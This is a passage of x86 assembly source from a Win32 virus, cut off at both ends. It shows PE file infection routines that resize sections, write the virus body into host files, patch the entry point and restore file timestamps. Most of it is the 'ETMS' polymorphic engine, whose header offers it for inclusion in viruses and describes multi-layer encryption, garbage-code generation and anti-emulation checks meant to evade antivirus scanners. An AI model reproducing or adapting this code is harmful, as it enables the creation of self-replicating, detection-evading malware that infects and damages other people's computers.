|
||
xchg eax, edi
|
||
push eax
|
||
; edi - virus length
|
||
mov eax, edi
|
||
add eax, [edx.3Ch]
|
||
add eax, [esi.10h]
|
||
mov ecx, [edx.3Ch]
|
||
neg ecx
|
||
and eax, ecx
|
||
mov [esi.10h], eax
|
||
cmp [esi.08h], eax
|
||
ja __x
|
||
mov [esi.08h], eax
|
||
__x: mov eax, [esi.08h]
|
||
add eax, [esi.0Ch]
|
||
push eax
|
||
mov ecx, [edx.38h]
|
||
neg ecx
|
||
and eax, ecx
|
||
cmp eax, 4 ptr [esp]
|
||
jae __xxx
|
||
add eax, [edx.38h]
|
||
__xxx:
|
||
mov [edx.50h], eax
|
||
pop eax
|
||
call fsize
|
||
xchg eax, edx
|
||
call seek
|
||
pop edx
|
||
db 0BFh
|
||
flen dd 0
|
||
mov ecx, [esi.10h]
|
||
add ecx, [esi.14h]
|
||
sub ecx, edi
|
||
call write
|
||
mov edx, [ebp.forUEP]
|
||
call seek
|
||
lea edx, [ebp.UEP]
|
||
mov ecx, 4 ptr [ebp.__rule_me]
|
||
add ecx, 4
|
||
call write
|
||
mov edx, [ebp.word3C]
|
||
call seek
|
||
lea edx, [ebp.buffer]
|
||
mov ecx, 0F8h + (28h*8)
|
||
call write
|
||
__1:
|
||
ret
|
||
endp
|
||
|
||
truncate proc
|
||
pushad
|
||
push ebx
|
||
call [ebp.SetEndOfFile]
|
||
jmp n_chk
|
||
endp
|
||
|
||
|
||
fsize proc
|
||
pushad
|
||
push 0 ebx
|
||
call [ebp.GetFileSize]
|
||
jmp n_chk
|
||
endp
|
||
|
||
|
||
gettime proc
|
||
pushad
|
||
; esi - addres struc
|
||
;
|
||
; CONST FILETIME * lpftLastWrite // time the file was last written
|
||
; CONST FILETIME * lpftLastAccess, // time the file was last accessed
|
||
; CONST FILETIME * lpftCreation, // time the file was created
|
||
;
|
||
; filetime struc
|
||
; dwLowDateTime dd ?
|
||
; dwHighDateTime dd ?
|
||
; ends
|
||
push esi
|
||
lodsd
|
||
lodsd
|
||
push esi
|
||
lodsd
|
||
lodsd
|
||
push esi ebx
|
||
call [ebp.GetFileTime]
|
||
jmp n_chk
|
||
endp
|
||
|
||
|
||
settime proc
|
||
pushad
|
||
; esi - addres struc
|
||
;
|
||
; CONST FILETIME * lpftLastWrite // time the file was last written
|
||
; CONST FILETIME * lpftLastAccess, // time the file was last accessed
|
||
; CONST FILETIME * lpftCreation, // time the file was created
|
||
;
|
||
; filetime struc
|
||
; dwLowDateTime dd ?
|
||
; dwHighDateTime dd ?
|
||
; ends
|
||
push esi
|
||
lodsd
|
||
lodsd
|
||
push esi
|
||
lodsd
|
||
lodsd
|
||
push esi ebx
|
||
call [ebp.SetFileTime]
|
||
jmp n_chk
|
||
endp
|
||
|
||
fattrs proc
|
||
pushad
|
||
push eax edx
|
||
call [ebp.SetFileAttributesA]
|
||
jmp n_chk
|
||
endp
|
||
|
||
fattrg proc
|
||
pushad
|
||
push edx
|
||
call [ebp.GetFileAttributesA]
|
||
jmp n_chk
|
||
endp
|
||
|
||
open proc
|
||
pushad
|
||
; eax - mode
|
||
; edx - name
|
||
;
|
||
; OF_READ Opens the file for reading only.
|
||
; OF_READWRITE Opens the file for reading and writing.
|
||
; OF_WRITE Opens the file for writing only.
|
||
push eax edx
|
||
call [ebp._lopen]
|
||
n_chk:
|
||
mov [esp.1Ch], eax
|
||
popad
|
||
ret
|
||
endp
|
||
|
||
close proc
|
||
pushad
|
||
push ebx
|
||
call [ebp.CloseHandle]
|
||
popad
|
||
ret
|
||
endp
|
||
|
||
write proc
|
||
pushad
|
||
push eax
|
||
mov eax, esp
|
||
push 0
|
||
push eax
|
||
push ecx edx ebx
|
||
call [ebp.WriteFile]
|
||
jmp n_check
|
||
endp
|
||
|
||
read proc
|
||
; ecx - length
|
||
; ebx - handle
|
||
; edx - buffer
|
||
pushad
|
||
push eax
|
||
mov eax, esp
|
||
push 0
|
||
push eax
|
||
push ecx edx ebx
|
||
call [ebp.ReadFile]
|
||
n_check:
|
||
pop eax
|
||
mov [esp.1Ch], eax
|
||
popad
|
||
cmp eax, ecx
|
||
jz __1
|
||
stc
|
||
__1:
|
||
ret
|
||
endp
|
||
|
||
seek proc
|
||
pushad
|
||
push 0 0 edx ebx
|
||
call [ebp.SetFilePointer]
|
||
jmp n_chk
|
||
endp
|
||
|
||
|
||
_EAX EQU 4 PTR [ESP+7*4]
|
||
_ECX EQU 4 PTR [ESP+6*4]
|
||
_EDX EQU 4 PTR [ESP+5*4]
|
||
_EBX EQU 4 PTR [ESP+4*4]
|
||
_ESP EQU 4 PTR [ESP+3*4]
|
||
_EBP EQU 4 PTR [ESP+2*4]
|
||
_ESI EQU 4 PTR [ESP+1*4]
|
||
_EDI EQU 4 PTR [ESP+0*4]
|
||
|
||
|
||
save_me dd 0
|
||
|
||
engine_serv:
|
||
push edx ecx
|
||
mov eax, [ebp.seed]
|
||
mov ecx, 714024+1
|
||
sub edx, edx
|
||
div ecx
|
||
mov [ebp.seed], edx
|
||
pop ecx edx
|
||
mov eax, _EBP
|
||
pusha
|
||
mov eax, 25*1024
|
||
add eax, [ebp.vl_sz]
|
||
push eax 0
|
||
call [ebp.GlobalAlloc]
|
||
mov _EDX, eax
|
||
popa
|
||
push edx ebp
|
||
mov ebp, [ebp.save_me]
|
||
add ebp, 4 ptr [eax.10h]
|
||
add ebp, 4 ptr [eax.0Ch]
|
||
inc ebp
|
||
inc ebp
|
||
call engine
|
||
pop ebp
|
||
pusha
|
||
push 4 ptr [esp+8*4]
|
||
call [ebp.GlobalFree]
|
||
popa
|
||
pop edx
|
||
ret
|
||
|
||
engine:
|
||
|
||
|
||
;
|
||
; - expressway to my skull -
|
||
; - [ETMS] v0.36 -
|
||
; - b0z0/iKX -
|
||
;
|
||
; This is a polymorphic engine for Win32/Win9X viruses. It should be fully
|
||
; compatible with any 486+ processor. You should check ver. 0.1 (Xine#4)
|
||
; for some more basic informations.
|
||
;
|
||
; Changes from v0.1:
|
||
; - Multiple layers of encryption (random from 2 to 7 layers)
|
||
; - New garbage types added (MOVSX, MOVZX, BT family, SET family,
|
||
; XADD, SHLD/SHRD, CMPXCHG, BSWAP, XLAT, ENTER/LEAVE) on regs,
|
||
; mem, flags (when possible). Direct read/write on stack using
|
||
; ESP + offset.
|
||
; - Antiemulation structures (code emulation checks, stack consistency
|
||
; checks, stack segment play, memory consistency on writes)
|
||
; - New ways of incrementing/decrementing pointer/counter, changing
|
||
; encryption key, initializing registers and exiting from loop.
|
||
; - Some minor parts have been rewritten
|
||
;
|
||
; Using the poly:
|
||
; Just add the ETMS source in your virus, simply:
|
||
; include etms.asm
|
||
; Set the registers as described below and then call the poly. The poly uses
|
||
; some data for internal purposes. This data of course is not needed to be
|
||
; carried around with your infected file or whatever. You can just include
|
||
; the ETMS source at the end of the file and then skip the bytes that start
|
||
; from the label _mem_data_start. Of course you'll need to have that free
|
||
; memory placed there at runtime.
|
||
; The random seed (the dd at seed) should be initialized at first poly
|
||
; run to a value between 0 and 714024.
|
||
;
|
||
; Calling parameters:
|
||
; ECX = Lenght of things to be encrypted
|
||
; ESI = Pointer to what we want to encrypt
|
||
; EDI = Where to place decryptor and encrypted stuff
|
||
; EBP = Offset at which decryptor will run
|
||
; EDX = Some free temporary place for the poly
|
||
; The two needed space zones (EDI and EDX) should be at least 25kb plus
|
||
; the lenght of your code. Just allocate some mem, you're in Windoze baby!
|
||
;
|
||
; On exit:
|
||
; EDI = Pointer to generated code
|
||
; ECX = Lenght of generated code (decryptor + encrypted code)
|
||
;
|
||
; Contacts:
|
||
; Email me at cl0wn@geocities.com or query me on irc.
|
||
;
|
||
; Special greetings:
|
||
; I'd like to specially thank StarZero/iKX for the great support and for
|
||
; convincing me to write this. Greetings also to pigpen/s0ftpj for persistent
|
||
; support irl, crazyness roxor! ;), and also greets to claire for making me
|
||
; feel like i tought i could never feel
|
||
;
|
||
; Misc greetings to:
|
||
; The entire iKX and S0ftpj crew and: kernel panic, darkman, gigabyte,
|
||
; jackie-, rucker, talena, benny, inty13, uselessa, reptile, dandler, fusys,
|
||
; jhb, slagehammer, giorgetto, tankie, griyo and gf, vecna, belfa, del0,
|
||
; wintermute, spanska, sepultura, cavallo, milla, ^syren^, claire.
|
||
;
|
||
; - live fast, die young -
|
||
; - written in aug/sept 2000 -
|
||
;
|
||
|
||
engine:
|
||
cld
|
||
push edi
|
||
push edi
|
||
|
||
call poly_delta
|
||
poly_delta:
|
||
pop eax ; where we are running
|
||
sub eax,offset poly_delta
|
||
push ecx
|
||
push eax
|
||
|
||
lea ebx,[offset v_runnin + eax]
|
||
|
||
o_vrun equ offset v_runnin ; save some bytes since off between
|
||
; various data is a 8b
|
||
mov dword ptr [ebx],ebp
|
||
mov dword ptr [ebx - (o_vrun - offset orig_dx)],edx
|
||
mov dword ptr [ebx - (o_vrun - offset layer_nr)],tl_space
|
||
|
||
xor ecx,ecx
|
||
bit_loop:
|
||
inc ecx
|
||
shl ebp,1
|
||
jnc bit_loop ; find higher bit with an 1
|
||
dec ecx ; for random memory offsets
|
||
|
||
mov byte ptr [ebx - (o_vrun - offset t_memand)],cl
|
||
pop ebp ; delta
|
||
|
||
how_manylayers:
|
||
call get_random_al7 ; random number of layers
|
||
cmp al,6 ; from 2 to 7
|
||
jae how_manylayers
|
||
mov ecx,l_space
|
||
mul ecx
|
||
mov dword ptr [ebx - (o_vrun - offset layer_end)],eax
|
||
|
||
pop ecx
|
||
start_layer:
|
||
|
||
o_tini equ offset r_pointer
|
||
lea ebx,[offset r_pointer + ebp]
|
||
; dest, cnt and source
|
||
mov dword ptr [ebx - (o_tini - offset t_inipnt)],edi
|
||
mov dword ptr [ebx - (o_tini - offset v_lenght)],ecx
|
||
mov dword ptr [ebx - (o_tini - offset v_virusp)],esi
|
||
|
||
mov dword ptr [ebx - (o_tini - offset r_pointer)],010ffffffh
|
||
mov dword ptr [ebx - (o_tini - offset t_chgpnt)],01000404h
|
||
|
||
xor eax,eax
|
||
mov dword ptr [ebx - (o_tini - offset t_fromend)],eax
|
||
mov dword ptr [ebx - (o_tini - offset t_pntoff)],eax
|
||
mov dword ptr [ebx - (o_tini - offset t_cntoff)],eax
|
||
mov dword ptr [ebx - (o_tini - offset w_loopbg)],eax
|
||
mov dword ptr [ebx - (o_tini - offset t_inacall)-2],eax
|
||
inc al
|
||
mov dword ptr [ebx - (o_tini - offset t_exitjmp)],eax
|
||
|
||
push edi ; initialize layer data
|
||
mov ecx,[ebx - (o_tini - offset layer_nr)]
|
||
lea edi,[ebx - (o_tini - offset enc_space) + ecx + 10h]
|
||
; init layers encryptor, regs struct no needed
|
||
mov al,90h ; virgin encryptor
|
||
mov dword ptr [ebx - (o_tini - offset w_encrypt)],edi
|
||
mov ecx,enc_max
|
||
rep stosb
|
||
pop edi
|
||
|
||
call rnd_garbage
|
||
|
||
mov ecx,3
|
||
|
||
mov esi,ebx ; to memory structures
|
||
mov edx,dword ptr [esi - (o_tini - offset layer_nr)]
|
||
; edx has offset in the layer structure
|
||
init_part:
|
||
push ecx
|
||
select_register:
|
||
call get_register ; get a unused register
|
||
xchg ebx,ecx
|
||
|
||
select_block:
|
||
call get_random_al7
|
||
and al,011b
|
||
jz select_block ; select from 01 to 03
|
||
|
||
dec eax
|
||
cmp byte ptr [eax+esi],0ffh ; check if that stage already
|
||
jne select_block ; done
|
||
|
||
mov byte ptr [eax+esi],bl ; save the register for that
|
||
; stage
|
||
or al,al
|
||
jnz not_pointer
|
||
|
||
mov dword ptr [esi - (offset r_pointer - offset enc_space) + edx + 12],edi
|
||
; save offset where the
|
||
jmp assign_next ; pointer is initialized
|
||
|
||
not_pointer:
|
||
dec eax
|
||
jnz not_counter
|
||
|
||
mov dword ptr [esi - (offset r_pointer - offset w_counter)],edi
|
||
jmp assign_next ; assign inital counter
|
||
|
||
not_counter:
|
||
|
||
call get_random ; get key
|
||
|
||
mov dword ptr [esi - (offset r_pointer - offset enc_space) + edx],eax
|
||
xchg eax,ecx ; save key for encryptor
|
||
|
||
call get_random
|
||
and al,1
|
||
jz assign_next ; if so use key
|
||
mov byte ptr [esi+2],20h ; don't use key, just imm
|
||
jmp next_loop
|
||
assign_next:
|
||
; BL register
|
||
; ECX value
|
||
|
||
; either with mov reg, imm or via stack
|
||
call get_random
|
||
shr al,1
|
||
jnc do_withmov
|
||
mov al,068h ; push immediate
|
||
stosb
|
||
xchg eax,ecx
|
||
stosd
|
||
call rnd_garbage
|
||
mov al,bl
|
||
add al,058h ; pop reg32 base
|
||
stosb
|
||
jmp next_loop
|
||
do_withmov:
|
||
mov eax,ebx ; in bl register
|
||
or al,0b8h ; mov base
|
||
stosb
|
||
xchg eax,ecx
|
||
stosd ; the value
|
||
|
||
next_loop:
|
||
mov al,bl
|
||
call set_used ; mark as unusable so far
|
||
|
||
call rnd_garbage
|
||
pop ecx
|
||
loop init_part ; make all init steps
|
||
|
||
|
||
; now some base assignment to a pointer, counter and key (if used) registers
|
||
; has been done. here we are gonna change a bit the various registers where
|
||
; the various things has been assigned
|
||
call get_random_al7
|
||
and al,011b ; from 0 to 3 moves, could be 0-7 ?
|
||
jz decryptor_build_start
|
||
xchg eax,ecx
|
||
reg_movida:
|
||
push ecx
|
||
get_whichone:
|
||
call select_save ; select which to change (pnt,cnt,key)
|
||
jc leave_this_out
|
||
|
||
call save_mov_xchg ; change the regs using mov or xchg
|
||
mov byte ptr [edx],al
|
||
leave_this_out:
|
||
pop ecx
|
||
loop reg_movida
|
||
|
||
decryptor_build_start:
|
||
; decryptor loop begins right here
|
||
|
||
lea esi,[offset t_chgpnt + ebp]
|
||
mov dword ptr [esi - (offset t_chgpnt - offset w_loopbg)],edi
|
||
|
||
call get_random ; select if starting from head or from
|
||
and ax,0101h ; tail and if counter will dec or inc
|
||
mov word ptr [esi - (offset t_chgpnt - offset t_fromend)],ax
|
||
|
||
xchg eax,edx ; rnd in edx
|
||
|
||
shl edx,1 ; add a constant to counter?
|
||
jnc normal_counter
|
||
call get_random
|
||
mov dword ptr [esi - (offset t_chgpnt - offset t_cntoff)],eax
|
||
normal_counter:
|
||
cmp byte ptr [esi - (offset t_chgpnt - offset r_pointer)],05h
|
||
; no bp + off
|
||
je reget_size_op
|
||
|
||
shl edx,1 ; select if use only pointer or
|
||
jc reget_size_op ; pointer + offset
|
||
call get_random ; select random offset
|
||
mov dword ptr [esi - (offset t_chgpnt - offset t_pntoff)],eax
|
||
; if using get offset
|
||
reget_size_op:
|
||
call get_random
|
||
mov edx,eax
|
||
and eax,0fh ; select math operation and size
|
||
or eax,eax ; of operand
|
||
jz reget_size_op
|
||
|
||
; byte word dword
|
||
; ror 1 6 b
|
||
; sub 2 7 c
|
||
; xor 3 8 d
|
||
; add 4 9 e
|
||
; rol 5 a f
|
||
;
|
||
no_rorrrpr:
|
||
cmp byte ptr [esi - (offset t_chgpnt - offset r_regkey)],03
|
||
; if not ax,cx,dx,bx then can't be byte
|
||
jb can_use_all ; as key
|
||
cmp al,6 ; is byte? get another
|
||
jb reget_size_op
|
||
|
||
can_use_all:
|
||
xor ecx,ecx
|
||
mov cl,10 ;9
|
||
cmp byte ptr [esi - (offset t_chgpnt - offset r_regkey)],20h
|
||
je no_keychanges
|
||
|
||
shr edx,8 ; edx has rnd
|
||
and edx,011b
|
||
mov byte ptr [esi - (offset t_chgpnt - offset t_chgkey)],dl
|
||
add ecx,edx ; add nr of key changes
|
||
|
||
no_keychanges:
|
||
cmp al,0bh
|
||
jae ok_counts
|
||
sub ecx,4d ; if with words 4 inc/dec less
|
||
sub word ptr [esi],0202h
|
||
cmp al,06d
|
||
jae ok_counts
|
||
dec ecx ; for bytes even less
|
||
dec ecx
|
||
sub word ptr [esi],0101h
|
||
|
||
ok_counts:
|
||
push eax
|
||
call rnd_garbage
|
||
get_nextseq:
|
||
call get_random_al7
|
||
cmp al,4
|
||
ja get_nextseq
|
||
xchg eax,edx
|
||
cmp byte ptr [esi+edx],0 ; need more ?
|
||
je get_nextseq
|
||
dec byte ptr [esi+edx]
|
||
shl edx,2 ; offset = * 4
|
||
sub edx,(offset t_chgpnt - offset o_table)
|
||
pop eax
|
||
push eax
|
||
push ecx
|
||
push esi
|
||
mov ecx,dword ptr [esi+edx]
|
||
add ecx,ebp
|
||
call ecx ; call the routine to do it
|
||
pop esi
|
||
pop ecx
|
||
pop eax
|
||
loop ok_counts
|
||
|
||
; finished decryption loop, needs just the jump backwards
|
||
call rnd_garbage
|
||
|
||
mov al,0e9h
|
||
stosb
|
||
xor eax,eax
|
||
xchg eax,dword ptr [esi - (offset t_chgpnt - offset w_loopbg)]
|
||
; the jump back to start of
|
||
sub eax,04h ; the decryptor and enable
|
||
sub eax,edi ; overwriting on loop :)
|
||
stosd
|
||
|
||
call rnd_garbage
|
||
call rnd_garbage
|
||
|
||
lea esi,[offset v_lenght + ebp]
|
||
|
||
push edi ; write the offset of the exit jump
|
||
mov edx,dword ptr [esi - (offset v_lenght - offset t_chkpos)]
|
||
sub edi,edx
|
||
mov dword ptr [edx-4],edi
|
||
pop edi
|
||
|
||
; now decryption loop generation is finished
|
||
mov byte ptr [esi - (offset v_lenght - offset r_used)],10h
|
||
; can use all regs (except ESP) again
|
||
|
||
call rnd_garbage ; unencrypted one, some more here
|
||
call rnd_garbage
|
||
|
||
push edi
|
||
call rnd_garbage ; encrypted garbage
|
||
pop ecx
|
||
neg ecx
|
||
add ecx,edi ; how much encrypted garbage
|
||
|
||
mov edx,ecx
|
||
sub edi,edx
|
||
|
||
add ecx,dword ptr [esi]
|
||
|
||
shr ecx,2 ; so it will be enough for b/w/d enc
|
||
inc ecx
|
||
shl ecx,2
|
||
|
||
movzx eax,byte ptr [esi - (offset v_lenght - offset t_prejmp)]
|
||
add ecx,eax ; decs before cmp, so we reach equality
|
||
|
||
pop eax
|
||
neg eax
|
||
add eax,edi ; lenght of decryptor
|
||
|
||
add eax,edx ; total displacement for this layer
|
||
push eax ; so we can correct mem refs
|
||
sub eax,edx
|
||
|
||
add eax,dword ptr [esi - (offset v_lenght - offset v_runnin)]
|
||
; running offset
|
||
|
||
push esi
|
||
add esi,dword ptr [esi - (offset v_lenght - offset layer_nr)]
|
||
mov ebx,dword ptr [esi - (offset v_lenght - offset enc_space) + 12]
|
||
pop esi
|
||
cmp byte ptr [esi - (offset v_lenght - offset t_fromend)],00h
|
||
pushf
|
||
je no_adding
|
||
add eax,ecx ; from end
|
||
no_adding:
|
||
sub eax,dword ptr [esi - (offset v_lenght - offset t_pntoff)]
|
||
; - pointer offset if is there
|
||
mov dword ptr [ebx+1],eax ; set initial pointer
|
||
|
||
mov ebx,dword ptr [esi - (offset v_lenght - offset w_counter)]
|
||
inc ebx
|
||
|
||
mov eax,dword ptr [esi - (offset v_lenght - offset t_cntoff)]
|
||
add eax,ecx
|
||
mov dword ptr [ebx],eax
|
||
|
||
cmp byte ptr [esi - (offset v_lenght - offset t_countback)],01h
|
||
je not_negcnt
|
||
neg dword ptr [ebx]
|
||
|
||
not_negcnt:
|
||
|
||
mov ebx,edi ; pointer on code to encrypt
|
||
add edi,edx ; + encrypted garbage
|
||
popf
|
||
je no_adding2
|
||
add ebx,ecx ; add lenght if from end
|
||
|
||
no_adding2:
|
||
|
||
; save layer data (cnt and pnt) in its entry
|
||
push esi
|
||
add esi,dword ptr [esi - (offset v_lenght - offset layer_nr)]
|
||
mov dword ptr [esi - (offset v_lenght - offset enc_space) +4],ecx
|
||
mov dword ptr [esi - (offset v_lenght - offset enc_space) +8],ebx
|
||
pop esi
|
||
|
||
push esi
|
||
mov esi,dword ptr [esi - (offset v_lenght - offset v_virusp)]
|
||
push ecx
|
||
sub ecx,edx
|
||
rep movsb ; copy what to encrypt
|
||
pop edx
|
||
pop esi
|
||
|
||
pop eax ; this layer lenght to sum
|
||
|
||
mov ecx,dword ptr [esi - (offset v_lenght - offset layer_nr)]
|
||
|
||
corr_addr:
|
||
cmp ecx,tl_space ; correct the adresses of the lower layers
|
||
je corr_end
|
||
add ecx,l_space
|
||
|
||
add [esi - (offset v_lenght - offset enc_space) + ecx + 12d],eax
|
||
add [esi - (offset v_lenght - offset enc_space) + ecx + 8d],eax
|
||
|
||
mov ebx,[esi - (offset v_lenght - offset enc_space) + ecx + 12d]
|
||
add dword ptr [ebx + 1],eax ; pointer from decryptor
|
||
jmp corr_addr
|
||
|
||
corr_end:
|
||
mov ecx,dword ptr [esi - (offset v_lenght - offset layer_end)]
|
||
|
||
cmp dword ptr [esi - (offset v_lenght - offset layer_nr)],ecx
|
||
je finished_layers
|
||
|
||
sub dword ptr [esi - (offset v_lenght - offset layer_nr)],l_space
|
||
|
||
pop ecx ; initial EDI
|
||
push ecx
|
||
push ecx
|
||
push ecx
|
||
sub ecx,edi ; calculate new lenght to encrypt
|
||
neg ecx
|
||
pop edi
|
||
|
||
push ecx
|
||
mov esi,dword ptr [esi - (offset v_lenght - offset orig_dx)]
|
||
xchg esi,edi
|
||
mov edx,edi
|
||
push esi
|
||
rep movsb ; copy to temp space and use that one
|
||
pop edi ; as source for next layer
|
||
mov esi,edx
|
||
pop ecx
|
||
jmp start_layer ; construct next encryption layer
|
||
|
||
finished_layers:
|
||
|
||
; now in reverse order
|
||
; create each encryption layer
|
||
mov eax,dword ptr [esi - (offset v_lenght - offset layer_end)]
|
||
sub esi,(offset v_lenght - (offset enc_space + 10h) - tl_space)
|
||
push edi
|
||
enc_nl:
|
||
|
||
mov ecx,enc_max ; the stored regs
|
||
lea edi,[ebp + offset enc_space_final]
|
||
rep movsb
|
||
pusha
|
||
lea edi,[ebp + offset enc_space_final]
|
||
__p2:
|
||
cmp 4 ptr [edi-2], 0FFFFD20Bh
|
||
jz __p1
|
||
inc edi
|
||
jmp __p2
|
||
__p1: mov al, 74h
|
||
stosb
|
||
stosb
|
||
lea eax, [ebp+exit_space_final]
|
||
sub eax, edi
|
||
mov 1 ptr [edi-1], al
|
||
popa
|
||
mov ecx, [esi - enc_max - 16] ; key value
|
||
mov edx, [esi - enc_max - 12] ; counter
|
||
mov ebx, [esi - enc_max - 8] ; pointer
|
||
sub esi, (l_space + enc_max) ; on next layer
|
||
|
||
; layer chunk, most of it will be overwritten by the one in the structure
|
||
|
||
enc_max equ 24h
|
||
; lenghts
|
||
; 6 = max encryption operation
|
||
; 4 = max 4 inc/dec counter
|
||
; 4 = max 4 inc/dec counter
|
||
; 3 * 6 = max 3 * 6 byte key change operations
|
||
; 4 = check on edx + jump short
|
||
|
||
enc_space_final:
|
||
db enc_max dup (90h) ; here the encryptor will be placed
|
||
jmp enc_space_final
|
||
exit_space_final:
|
||
|
||
add eax,l_space ; next layer structure
|
||
cmp eax,(tl_space + l_space); last layer to do?
|
||
jne enc_nl
|
||
|
||
ll_end:
|
||
pop ecx ; the final edi
|
||
pop edi ; calling edi
|
||
sub ecx,edi ; total lenght
|
||
ret ; poly finished
|
||
|
||
; - ETMS return point
|
||
poly_name db '[ETMS] v0.36 -b0z0/iKX-'
|
||
|
||
put_encloop_2:
|
||
push ecx
|
||
xor ecx,ecx
|
||
inc ecx
|
||
inc ecx
|
||
jmp short put_encloop
|
||
put_encloop_1:
|
||
push ecx
|
||
xor ecx,ecx
|
||
inc ecx
|
||
put_encloop:
|
||
; ecx nr of bytes
|
||
push eax
|
||
xchg edi,dword ptr [w_encrypt+ebp] ; in EDI where we are in enc
|
||
; and save dec position
|
||
copy_it:
|
||
stosb
|
||
shr eax,8
|
||
loop copy_it
|
||
xchg dword ptr [w_encrypt+ebp],edi ; save next and restore dec pnt
|
||
pop eax
|
||
pop ecx
|
||
ret
|
||
|
||
o_table:
|
||
o_counter dd offset ch_counter
|
||
o_pointer dd offset ch_pointer
|
||
o_key dd offset ch_key
|
||
o_mate dd offset ch_mate
|
||
o_exitjmp dd offset ch_exitjmp
|
||
|
||
ch_exitjmp: ; compare and exit jump for dec loop
|
||
xor eax,eax
|
||
inc eax
|
||
mov ecx,dword ptr [esi - (offset t_chgpnt - offset t_cntoff)]
|
||
or ecx,ecx
|
||
jnz must_compare ; is + a constant ?
|
||
|
||
get_checker:
|
||
call get_random
|
||
and eax,0fh
|
||
cmp al,09d
|
||
ja get_checker
|
||
must_compare:
|
||
shr al,1
|
||
pushf
|
||
mov ah,byte ptr [eax + offset chk_counter + ebp] ; get comparer
|
||
add ah,byte ptr [esi - (offset t_chgpnt - offset r_counter)]
|
||
mov al,81h
|
||
popf
|
||
jc store_d00
|
||
inc eax
|
||
inc eax
|
||
stosw
|
||
xor al,al
|
||
stosb
|
||
jmp make_jumps
|
||
store_d00:
|
||
stosw
|
||
xchg eax,ecx
|
||
cmp byte ptr [esi - (offset t_chgpnt - offset t_countback)],01h
|
||
je not_negcnt1
|
||
neg eax
|
||
not_negcnt1:
|
||
stosd
|
||
make_jumps:
|
||
mov ax,840fh ; jz long
|
||
stosw
|
||
stosd
|
||
mov dword ptr [esi - (offset t_chgpnt - offset t_chkpos)],edi
|
||
done_cond:
|
||
|
||
xchg edi,dword ptr [esi - (offset t_chgpnt - offset w_encrypt)]
|
||
mov ax,0d20bh
|
||
stosw
|
||
mov al, 0FFh ; BUG were here
|
||
stosb
|
||
stosb
|
||
xchg edi,dword ptr [esi - (offset t_chgpnt - offset w_encrypt)]
|
||
ret
|
||
|
||
ch_counter: ; decrement/increment counter
|
||
cmp byte ptr [esi - (offset t_chgpnt - offset t_exitjmp)],00h
|
||
je no_pntchgndd
|
||
inc byte ptr [esi - (offset t_chgpnt - offset t_prejmp)]
|
||
no_pntchgndd:
|
||
mov ah,byte ptr [esi - (offset t_chgpnt - offset r_counter)]
|
||
mov al,byte ptr [esi - (offset t_chgpnt - offset t_countback)]
|
||
mov cl,0ah ; edx + always dec in encryptor
|
||
jmp mk_incdec
|
||
|
||
ch_pointer: ; increment/decrement pointer
|
||
mov ah,byte ptr [esi - (offset t_chgpnt - offset r_pointer)]
|
||
mov al,byte ptr [esi - (offset t_chgpnt - offset t_fromend)]
|
||
mov cl,03h ; using ebx in encryptor
|
||
; jmp mk_incdec
|
||
|
||
mk_incdec:
|
||
; al = 0 means dec, 1 means inc
|
||
; ah = register to use
|
||
; cl = oring for encryptor
|
||
shl al,3
|
||
or al,40h
|
||
or al,ah
|
||
push eax
|
||
push eax ; will need this one for encryptor
|
||
call get_random_al7 ; how enc/dec stuff ?
|
||
shr al,1
|
||
jnc lbl_hh
|
||
pop eax
|
||
jmp set_enc_id_pre ; do with inc/dec
|
||
lbl_hh:
|
||
shr al,1
|
||
mov al,083h ; common prefix
|
||
stosb
|
||
pop eax
|
||
jc do_with_sub
|
||
; do with add (either +1 or +(-1))
|
||
or ah,0c0h
|
||
and al,8h ; was decrementing ?
|
||
jnz use_minus1
|
||
jmp use_plus1
|
||
|
||
do_with_sub:
|
||
or ah,0e8h
|
||
and al,08h ; was incrementing
|
||
jz use_minus1
|
||
|
||
use_plus1:
|
||
xor al,al ; 01h
|
||
inc al
|
||
jmp set_enc_id_pre2
|
||
use_minus1:
|
||
xor al,al ; 0ffh
|
||
dec al
|
||
set_enc_id_pre2:
|
||
xchg ah,al
|
||
stosb
|
||
xchg ah,al
|
||
set_enc_id_pre:
|
||
stosb
|
||
set_enc_id:
|
||
pop eax
|
||
and al,(NOT 0111b)
|
||
or al,cl
|
||
jmp put_encloop_1 ; put in encryptor and go away
|
||
|
||
ch_key: ; change key register
|
||
cmp byte ptr [esi - (offset t_chgpnt - offset r_regkey)],20h
|
||
je exit_keychange
|
||
get_modifier:
|
||
call get_random_al7
|
||
mov cl,al
|
||
mov ah,byte ptr [eax + offset key_changers + ebp]
|
||
mov al,81h ; add/sub/xor base
|
||
|
||
cmp cl,3
|
||
jb no_rrrr
|
||
mov al,0c1h ; rol/ror base
|
||
|
||
cmp cl,5
|
||
jne no_rrrr
|
||
mov al,0f7h
|
||
|
||
no_rrrr:
|
||
push eax
|
||
reget_ksize:
|
||
call get_random ; select if byte/word/dword
|
||
and al,011b
|
||
jz reget_ksize
|
||
cmp cl,05h ; inc dec just on dw and dd
|
||
jbe isntincdec
|
||
cmp al,01h
|
||
je reget_ksize
|
||
isntincdec:
|
||
cmp byte ptr [esi - (offset t_chgpnt - offset r_regkey)],3
|
||
jbe canall
|
||
cmp al,01b ; byte keychange only for ax,cx,dx,bx
|
||
je reget_ksize
|
||
canall:
|
||
mov ch,al
|
||
mov dl,ah ; random stuff
|
||
pop eax
|
||
cmp ch,01h
|
||
jne no_decbyte
|
||
dec al
|
||
shr dl,1
|
||
jc no_decbyte
|
||
add ah,04h ; work on high byte
|
||
no_decbyte:
|
||
cmp ch,02h
|
||
jne no_wordprefix
|
||
push eax
|
||
mov al,66h
|
||
stosb
|
||
call put_encloop_1
|
||
pop eax
|
||
no_wordprefix:
|
||
cmp cl,06h
|
||
pushf
|
||
jb no_incdecch ; inc/dec has just one byte opcode
|
||
dec edi
|
||
mov al,byte ptr [edi]
|
||
no_incdecch:
|
||
popf
|
||
push eax
|
||
jb no_nopneeded
|
||
mov al,ah
|
||
or al,1 ; ecx key in enc loop
|
||
call put_encloop_1 ; for inc/dec
|
||
jmp short after_store
|
||
no_nopneeded:
|
||
or ah,1 ; key is ECX in enc loop
|
||
call put_encloop_2
|
||
after_store:
|
||
pop eax
|
||
or ah,byte ptr [esi - (offset t_chgpnt - offset r_regkey)]
|
||
stosw
|
||
cmp cl,05 ; inc/dec/not doesn't need any key
|
||
jae exit_keychange
|
||
call get_random
|
||
cmp cl,03
|
||
jae just_one_bk ; ror/rol just one byte key
|
||
cmp ch,01h
|
||
je just_one_bk ; check dimension of key modifier
|
||
stosb
|
||
call put_encloop_1
|
||
shr eax,8h
|
||
cmp ch,02h
|
||
je just_one_bk
|
||
stosw
|
